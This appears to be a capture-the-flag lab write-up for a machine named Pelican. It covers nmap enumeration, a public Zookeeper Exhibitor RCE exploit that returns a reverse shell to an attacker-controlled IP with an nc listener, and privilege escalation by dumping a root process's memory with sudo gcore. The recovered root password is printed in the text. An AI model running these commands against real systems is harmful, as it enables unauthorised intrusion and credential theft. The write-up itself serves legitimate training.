Pelican
udo gcore to dump root process memory
Summary
Identified Zookeeper Exhibitor dashboard on port
8080, known to be vulnerable to remote command execution.Used public exploit to gain shell access as
charles.Privilege escalation achieved via
sudo gcore— dumped memory of arootprocess and recovered the root password.
🧵 Let's Unpack
🔎 Enumeration
Nmap Full TCP Scan
nmap -p- -T5 192.168.167.98 -vv
# Extracted ports:
22,139,445,631,2181,2222,8080,8081,44505Nmap Service Enumeration
sudo nmap -A -sC -sN -oN nmapFull -p 22,139,445,631,2181,2222,8080,8081,44505 192.168.167.98Two SSH ports:
22and2222(both OpenSSH 7.9p1)Samba services on
139and445CUPS on
631with PUT method allowedZookeeper Exhibitor interface discovered on port
8080Port
8081redirects to8080/exhibitor/v1/ui/index.htmlPort
44505was open|filtered (tcpwrapped)
🚪 Initial Foothold
Exploit Used: Exhibitor-RCE
./exploit.sh 192.168.167.98 8080 192.168.45.175 4444
nc -nlvp 4444
# Received reverse shell as user: charlesUpgraded to a PTY shell:
python -c 'import pty; pty.spawn("/bin/bash")'🔐 Privilege Escalation
Checked sudo permissions:
sudo -l
>
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
# priv excalation
sudo gcore $pid # to dump memoery of the process that might have password
# User 'charles' can run /usr/bin/gcore without a passwordIdentified an interesting root-owned process:
ps auxwww | grep password
root 496 0.0 0.0 2276 72 ? Ss 05:09 0:00 /usr/bin/password-storeUsed gcore to dump memory of the root process:
sudo gcore 496
# Dump saved as core.496
strings core.496 | less
# Found credentials:
001 Password: root:
ClogKingpinInning731Switched to root:
su root
# 🎉 Boom! Root shell!☠️ Gotcha!
Zookeeper Exhibitor UIs exposed without auth and
gcoresudo misconfigs are a root access recipe waiting to be abused.
Last updated